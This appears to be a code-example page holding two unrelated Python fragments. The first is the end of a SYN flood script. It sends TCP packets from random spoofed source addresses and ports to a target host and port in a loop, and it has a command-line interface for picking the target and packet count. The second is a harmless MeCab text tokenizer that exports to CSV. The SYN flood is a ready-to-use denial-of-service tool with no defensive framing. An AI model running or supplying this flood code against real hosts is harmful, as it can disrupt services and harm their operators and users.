示例#1
0
        # Combine
        packets = ip_layer / tcp_layer

        send(packets, verbose=0)
        sent_count += 1
        stdout.writelines("Sending from " + random_ip + ":" +
                          str(random_port) + " -> " + destination_ip + ":" +
                          str(destination_port) + "\n")

    stdout.writelines("Packets sent: %i\n" % sent_count)


if __name__ == "__main__":
    usage_cmd = 'Usage: \n'
    usage_cmd += ' ' + os.path.basename(__file__)
    usage_cmd += ' -h <destination_ip> -p <destination_port> -c <loop_count>'

    raw_input = ArgumentParser(sys.argv[1:], usage_cmd)

    if not raw_input.validate():
        raw_input.print_usage()
        exit(2)

    # Parse & get argument value
    args = raw_input.parse(["h", "p", "c"], ["host=", "port=", "count="])
    host = raw_input.get_value_by_key("-h", args)
    port = raw_input.get_value_by_key("-p", args)
    count = raw_input.get_value_by_key("-c", args)

    SynFlood(host, int(port), int(count))
示例#2
0
    tokenizer = MeCabTokenizer(tagger='-Ochasen')
    output_arr = []
    stop_words = ['。', '、', '・']
    for sentence in sentence_arr:
        tokens = tokenizer.parse_to_node(sentence)
        surface = []
        while tokens:
            if tokens.surface and tokens.surface not in stop_words:
                surface.append(tokens.surface)
            tokens = tokens.next
        if len(surface) > 0:
            output_arr.append([sentence, " ".join(surface)])

    csv_obj.export(csv_export_path, output_arr)


if __name__ == "__main__":
    usage_cmd = 'Usage: \n'
    usage_cmd += ' ' + os.path.basename(__file__)
    usage_cmd += ' -i <input_file> -e <export_file>'

    raw_input = ArgumentParser(sys.argv[1:], usage_cmd)

    if not raw_input.validate():
        raw_input.print_usage()
        exit(2)

    # Parse & get argument value
    args = raw_input.parse(["i", "e"], ["import=", "export="])
    tokenizing(raw_input.get_value_by_key("-i", args), raw_input.get_value_by_key("-e", args))